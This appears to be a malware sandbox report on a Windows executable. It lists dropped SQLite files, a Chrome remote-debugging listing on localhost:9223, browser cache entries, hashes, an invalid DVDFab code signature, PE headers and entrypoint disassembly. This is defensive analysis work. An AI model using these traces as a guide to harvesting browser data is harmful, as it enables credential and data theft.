Process:	C:\Users\user\Desktop\Cm2GRjWK1C.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\dba1d\y58gl6

Download File

Process:	C:\Users\user\Desktop\Cm2GRjWK1C.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\json[1].json

Download File

Process:	C:\Users\user\Desktop\Cm2GRjWK1C.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.3739183112495414
Encrypted:	false
SSDEEP:	48:SfNaoCJTECbfNaoC5aXC5ifNaoCoCLCoLFfNaoCd8jv0UrU0U8CO:6NnCJTECzNnC5aXC5KNnCoCLCoLxNnCc
MD5:	97A2050FE58367669751F7030A290237
SHA1:	AD0B8760BDD72DA4E13F449E8021D1D7D808452D
SHA-256:	1C83A00CFACF0F94B6FD989D3909887194356943F1E7F43692DFBCAB7F5FE714
SHA-512:	895849F3C3517CD1B346BB4F428552A7824A8EF3EEF189A2277E00952D23055BC21FD3616E719A3A50694FFD261A2E4686E69A6874697714DADB972D71B16A9F
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6859D1544080066792DACFBA4C738CDC",.. "id": "6859D1544080066792DACFBA4C738CDC",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6859D1544080066792DACFBA4C738CDC"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/93F4F2406F7BFC91A14DD72FAF5116B8",.. "id": "93F4F2406F7BFC91A14DD72FAF5116B8",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/93F4F2406F7BFC91A14DD72FAF5116B8"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

Chrome Cache Entry: 67

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.349865760247148
Encrypted:	false
SSDEEP:	96:mtOTUb1db1ClNY5co7shdiUYVqig7O7aZCUgpgXEt94k+g8IHh8u928DoCLQ:mtOT8TfL1Vqig7mIg8IB8u88DA
MD5:	70A8F21806E7F1B739937970EBE49A0C
SHA1:	6BE9EEBCE438DE91FEB20E6A5458774B327AA9B4
SHA-256:	C8B531CFD6E9BE13762E289820F67406331303CD5111A885DE959BF83DD0F5AC
SHA-512:	3C055567D0ED53BD30773C0BE475DC7499E44AFB92FB05021029D9A0C1299A470CDD3A8CACCCF798D5345ED627C5836E9DF5955A120FE56BA3624EC76A673270
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.sDa5bc0wD58.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTucClwlLUqaQmlTybxGncrc_XS2Pg"
Preview:	.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_H .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_H .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_H .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 69

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1437)
Category:	downloaded
Size (bytes):	117390
Entropy (8bit):	5.490758436358278
Encrypted:	false
SSDEEP:	3072:jMyvhJyj1UjPEWKcxUww3wM0W/N79419n5QJEx:jMyfyj1cPPC70W/Na5QJEx
MD5:	B52266FAD5115039E3806FF8DCD71F86
SHA1:	8007278E322C8EA9F3CB5B62008E3E3599E9F659
SHA-256:	E390D05D78F6E51B03F7C3D1D0C3B7C3E79B3D53C4F83685CFAD83D2E863456E
SHA-512:	58293A89F48926A7059F6C91AA79EBD941072D3BC31AA571342ABA76F007981750620F960CCB59E9E3C828FC8E1748B500E3138381D82EF8A171AD7C60F5C5FC
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);.var aa,ea,la,oa,ya,Ba,Ca;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.la=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.na=la(this);oa=function(a,b){if(b)a:{var c=_.na;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.oa("Symbol",function(a){if(a)return a;var b

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	131664
Entropy (8bit):	5.437939396504528
Encrypted:	false
SSDEEP:	3072:M+/kDj4BST/k4ZYSTVcxhN0aZI4RpTh6z6x0zW:jYjLT/k4ZYSTVcxhN0aZI4RpTh46AW
MD5:	45AB13CABD50284862E5C33D47013F32
SHA1:	D4AC0AC5F5BD2227CE3F3FDB5BBCD99114E52EEF
SHA-256:	291A869B2BF880EEA174C3599E6620E08ECEAE0E92E50DE86598CA6DC115EDA0
SHA-512:	43155733EDA03B05907FC18D5E29B3814852984DFE999876517C812D1209283DCD97906BDF8E23BB11A9F74FBF12C8D4610AFE34554F0EFF6FD372F707B70DE6
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2412)
Category:	downloaded
Size (bytes):	173494
Entropy (8bit):	5.555398746302217
Encrypted:	false
SSDEEP:	3072:wZ7uHDIsNQgotB5eWAkoF8SgF5JBnz5P2eNmAp1ofnDT9mm0GdZINGJDuqFeRyX5:wZ7ujIsNQgotBwWAkoF8S25JBnz5P2eg
MD5:	4B41432CA29BA7B366890C3211D319DD
SHA1:	C60F89E8ACCE6E93A14BE7E09C8A719BAC3AAF46
SHA-256:	9E09A8F1471D9E076C80D0E6D9D4A888E34D63EA93EF10740811E82FA9E1BD94
SHA-512:	BA762DAE90D37D25E8BA33F7FC43A58C6C758D842912288110923F798245A3A1408AFC13AAC7124A8CDE2D3E6D9AB50BDD626D0558421945785139E0EDA15C38
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.eebVy_fNKiM.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTv9PWxAWOkNMB0THY2YxYWamdWWtA"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Oi=function(a){if(4&a)return 2048&a?2048:4096&a?4096:0};_.Pi=class extends _.P{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Qi,Ti,Ui,Wi,Xi,aj;Qi=function(){return typeof BigInt==="function"};Ti=function(a){const b=a>>>0;_.Ri=b;_.Si=(a-b)/4294967296>>>0};Ui=function(a,b){b=~b;a?a=~a+1:b+=1;return[a,b]};_.Vi=function(a){if(a<0){Ti(-a);const [b,c]=Ui(_.Ri,_.Si);_.Ri=b>>>0;_.Si=c>>>0}else Ti(a)};Wi=function(a){a=String(a);return"0000000".slice(a.length)+a};.Xi=function(a,b){b>>>=0;a>>>=0;if(b<=2097151)var c=""+(4294967296b+a);else Qi()?c=""+(BigInt(b)<<BigInt(32)\|BigInt(a)):(c=(a>>>24\|b<<8)&16777215,b=b>>16&65535,a=(a&16777215)+c6777216+b6710656,c+=b8147497,b*=2,a>=1E7&&(c+=a/1E7>>>0,a%=1E7),c>=1E7&&(b+=c/1E7>>>0,c%=1E7),c=b+Wi(c)+Wi(a));return c};_.Yi=function(a,b){if(b&2147483648)if(Qi())a=""+(BigInt(b\|0)<<BigInt(32)\|BigInt(a>>>0));else{const [c,d]=Ui(a,b);a="-"+Xi(c,d)}else a=Xi(a,b);return a};._.Zi

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3052)
Category:	downloaded
Size (bytes):	3057
Entropy (8bit):	5.86986197186125
Encrypted:	false
SSDEEP:	48:hM/ojLeBKlgJXwRoVerCQUow7/ArbDVrUmwBnJDixQ9/iaJH8XZKdyvY7gg6cArT:fLnlUerCh7/ODRLwnDiq/iAc8yvY7TM/
MD5:	FBBA38631AC02E21A9BD1E6B73895F51
SHA1:	A2E1C2098AC3A4E3C7B7C7443E0F059AE51F6994
SHA-256:	9D57D4F161A2DE836433625CC2CB22FE161C5A483057201534EA8EA5C50F7483
SHA-512:	405A9F4FA07BE0524137E14EF33FCDD45FDFC9703AFD7758FEDB003C8B7FD211561D28EE3907DC655FF78C15BAEE60D00C0600EEDE2ED485A1C5B3B1E405C622
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
Preview:	)]}'.["",["chicago bears","the conners season 7","blood moon total lunar eclipse tonight","nintendo switch 2 console","st louis missouri tornado warning","netflix black mirror season 7","southwest airlines checked baggage fees","denver nuggets lakers"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"google:entityinfo":"CggvbS8wMXkzdhINRm9vdGJhbGwgdGVhbTLaC2RhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRUFBQUFBckNBTUFBQUQvaEg1MUFBQUFwVkJNVkVYLy8vL0lPQU1BQUFESE5BREdLUUR4OHZJUkdTckRGUUI1ZTRER0xnREF4TWZGSXdET1ZUc0FBQTNFSGdDK3Y4SHR3THF2c0xQZTMrQ1ZsNXZOVVRYbTV1Y29MVHRNVDFsWVcyTkJSVSszdUx1UGtKWFUxZGJPV0Qrd3RibWxwNm9iSWpMUlpWRGhvcG4zNHQva3JLUHZ6OHJkazRjQUFCNHlOMFBWZEdQUFhVWUFEU04rZzRuMzJOVEtRaC9VYkZqY2lueis4TzVvYTNNQUFCWFhmR3pMU1Nyb3RxN3QvUFV6QUFBRGFVbEVRVlJJaVoxV2FXT2lRQXlOd3lEWGN0OUNSZVVvS3JwQ1cvNy9UOXR3YVJYUWJkOUhacEpKWHBJWEFHWmhxeWJ2T1VkWmx0OGRsemRY

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.865128894260481
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Cm2GRjWK1C.exe
File size:	8'282'848 bytes
MD5:	9a6088f8f1880ab2d28748fed448b4bc
SHA1:	a5ced9f99e56c0d706bb974200c03db64e00db57
SHA256:	3078a82218b5bb136c0420d8415d3943f0bd10180efefe298869a5401ddb1f96
SHA512:	e8d52331a141a43f0b6d828cb3bf7359614eefe0dbbc963e16f7008e026485e3fb3b1f62f1202c7cafe5bbcea84712ace9336e19346e1e4e007c060c4dcfb2f9
SSDEEP:	98304:jsCBQGy7kgfaqYHctwclP7C6UM47rO/1bDqU87lALV1:jsakk4aqyCwCG6W7i/1bDdUA
TLSH:	1086389069808365E993087CF83BD6A9C5E96D2C231D9CCFE27C3D6825327F1D632796
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......$D..`%l.`%l.`%l.&t..g%l.....f%l.mw..V%l.mw...%l.mw..z$l.....b%l.i]..e%l.i]..A%l.`%m..$l.....{%l......'l......%l.mw..a%l.`%..a%l

File Icon


Icon Hash:	073971c0cc793917

Static PE Info

General

Entrypoint:	0x673c83
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x671716E7 [Tue Oct 22 03:07:19 2024 UTC]
TLS Callbacks:	0x6a0a00
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	ae5692119ca96099d067159a15d2b778

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	06/09/2023 07:47:05 06/09/2026 07:47:05
Subject Chain	CN=DVDFab Software Inc., O=DVDFab Software Inc., STREET=\u6d77\u6dc0\u533a\u5317\u56db\u73af\u897f\u8def9\u53f72108, L=Beijing, S=Beijing, C=CN, OID.1.3.6.1.4.1.311.60.2.1.2=Beijing, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=91110108766259016Q, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	A85DB61CA9B69A5DF64055F8C3D1CB33
Thumbprint SHA-1:	D5934B7675B625AC8AB1D3EBC68A98E18B0C750B
Thumbprint SHA-256:	FE4569091AA262B32E2511F193D0AF25A642ACA603514FC1ED6754C2DC8BC5BB
Serial:	2AE80675B745876BE69E1573

Entrypoint Preview

Instruction
call 00007FB6F0B6C9A1h
jmp 00007FB6F0B5A9E4h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov cx, word ptr [eax]
add eax, 02h
test cx, cx
jne 00007FB6F0B5AB57h
sub eax, dword ptr [ebp+08h]
sar eax, 1
dec eax
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 20h
and dword ptr [ebp-20h], 00000000h
xor eax, eax
push edi
lea edi, dword ptr [ebp-1Ch]
push 00000007h
pop ecx
rep stosd
pop edi
cmp dword ptr [ebp+0Ch], eax
jne 00007FB6F0B5AB77h
call 00007FB6F0B55D60h
mov dword ptr [eax], 00000016h
call 00007FB6F0B655B7h
or eax, FFFFFFFFh
jmp 00007FB6F0B5ABB2h
mov eax, dword ptr [ebp+08h]
test eax, eax
je 00007FB6F0B5AB46h
push esi
push dword ptr [ebp+14h]
mov dword ptr [ebp-18h], eax
push dword ptr [ebp+10h]
mov dword ptr [ebp-20h], eax
lea eax, dword ptr [ebp-20h]
push dword ptr [ebp+0Ch]
mov dword ptr [ebp-1Ch], 7FFFFFFFh
push eax
mov dword ptr [ebp-14h], 00000042h
call 00007FB6F0B6818Ch
add esp, 10h
mov esi, eax
dec dword ptr [ebp-1Ch]
js 00007FB6F0B5AB6Ah
mov ecx, dword ptr [ebp-20h]
mov byte ptr [ecx], 00000000h
jmp 00007FB6F0B5AB6Fh
lea eax, dword ptr [ebp-20h]
push eax
push 00000000h
call 00007FB6F0B672AAh
pop ecx
pop ecx
mov eax, esi
pop esi
mov esp, ebp
pop ebp
ret
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push 00000000h
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FB6F0B5AACEh
add esp, 10h
pop ebp
ret
push ebp
mov ebp, esp
push esi
call 00007FB6F0B6D28Fh

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2013 UPD5 build 40629
[C++] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x36efd0	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x395000	0x419fa9	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x7e3000	0x32e0	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7af000	0x218be	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2bb4b0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x349734	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3496d0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2ba000	0x6e4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2b89cc	0x2b8a00	1a8f854aac6089b7ab6328c9b6fe1119	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2ba000	0xb73a0	0xb7400	29ab146545d6e811dd87c9d36e8d9bc4	False	0.3519488616984993	data	5.356587610858723	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x372000	0x21628	0x10200	a7c766723e660c1eb49f7fd349055900	False	0.3573461724806202	data	5.458950960241768	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x394000	0x2	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x395000	0x419fa9	0x41a000	aa9b84d5ba9aec1e0704c9b058dff522	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7af000	0x48a00	0x48a00	caf4b0fd036edbf4ef4b2292087ab154	False	0.7512976011187608	data	7.620155002441871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
TXT	0x395ff8	0x1d	ASCII text, with no line terminators	Chinese	China	1.2758620689655173
TXT	0x396018	0x1d	ASCII text, with no line terminators	Chinese	China	1.2758620689655173
XML	0x396038	0x444c	XML 1.0 document, ASCII text	Chinese	China	0.4140928849233585
XML	0x39a484	0x42c4	XML 1.0 document, ASCII text	Chinese	China	0.41247367189328343
RT_BITMAP	0x39e748	0x47142	Device independent bitmap graphic, 311 x 311 x 24, image size 291098, resolution 2834 x 2834 px/m	Chinese	China	0.10012090486298594
RT_BITMAP	0x3e588c	0x47142	Device independent bitmap graphic, 311 x 311 x 24, image size 291098, resolution 2834 x 2834 px/m	Chinese	China	0.10012090486298594
RT_BITMAP	0x42c9d0	0x776	Device independent bitmap graphic, 622 x 1 x 24, image size 1870, resolution 2834 x 2834 px/m	Chinese	China	0.8858638743455497
RT_BITMAP	0x42d148	0x65ea	Device independent bitmap graphic, 197 x 44 x 24, image size 26050, resolution 2834 x 2834 px/m	Chinese	China	0.10199310080490609
RT_BITMAP	0x433734	0x65ea	Device independent bitmap graphic, 197 x 44 x 24, image size 26050, resolution 2834 x 2834 px/m	Chinese	China	0.2310847067842085
RT_BITMAP	0x439d20	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.07319223985890652
RT_BITMAP	0x43a190	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.07583774250440917
RT_BITMAP	0x43a600	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.07231040564373897
RT_BITMAP	0x43aa70	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.05555555555555555
RT_BITMAP	0x43aee0	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.05026455026455026
